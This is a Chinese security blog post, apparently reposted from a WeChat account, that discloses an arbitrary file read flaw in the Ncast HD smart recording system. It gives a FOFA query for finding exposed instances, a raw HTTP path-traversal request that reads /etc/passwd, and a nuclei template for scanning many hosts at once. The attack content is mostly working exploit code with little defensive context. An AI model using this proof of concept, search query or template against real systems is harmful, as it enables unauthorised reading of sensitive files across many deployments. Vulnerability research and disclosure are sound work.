Ncast高清智能录播系统存在任意文件读取漏洞

admin

104956
文章

87
评论

2024年5月7日07:54:36评论9 views字数 1072阅读3分34秒阅读模式

漏洞简介

Ncast 录播系统能将授课或演讲者之影像、声音及上课讲义，以全硬件设备方式即时记录成标准的网络流媒体格式，并通过网络及服务器同步直播。

FOFA语句

title=="高清智能录播系统"

Ncast高清智能录播系统存在任意文件读取漏洞

测试截图

Ncast高清智能录播系统存在任意文件读取漏洞

POC如下：

GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: close

Ncast高清智能录播系统存在任意文件读取漏洞

nuclei批量验证：

id: ncast_arbitrary_file_readinfo:  name: Ncast任意文件读取漏洞  author: maoge  severity: high  description: Ncast高清智能录播系统任意文件读取漏洞  reference:    - https://example.com/  metadata:    verified: true    max-request: 1    fofa-query: title=="高清智能录播系统"    hunter-query: web.title=="高清智能录播系统"http:  - raw:      - |        GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0        Accept: */*        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close    max-redirects: 3    matchers-condition: and    matchers:      - type: word        part: body        words:          - bin/sh          - root

原文始发于微信公众号（Rock sec）：Ncast高清智能录播系统存在任意文件读取漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

Ncast高清智能录播系统存在任意文件读取漏洞

漏洞简介

FOFA语句

测试截图

nuclei批量验证：

Gradio component server 任意文件读取(CVE-2024-1561)

漏洞复现 | 用友政务财务系统FileDownload接口任意文件读取漏洞【附poc】

Atlassian Jira遍历和读取文件系统漏洞（CVE-2023-26255）

某ERP系统RCE漏洞（附EXP）

金盘图书馆微信管理后台信息泄露漏洞

用友畅捷通T+ Upload.aspx 任意文件上传漏洞

漏洞预警 | Apache Superset服务器端请求伪造漏洞

漏洞预警 | Google Android Framework权限提升漏洞

漏洞预警 | Apple ImageIO远程代码执行漏洞

QQ 逻辑漏洞可执行文件漏洞复现

发表评论

在线咨询

微信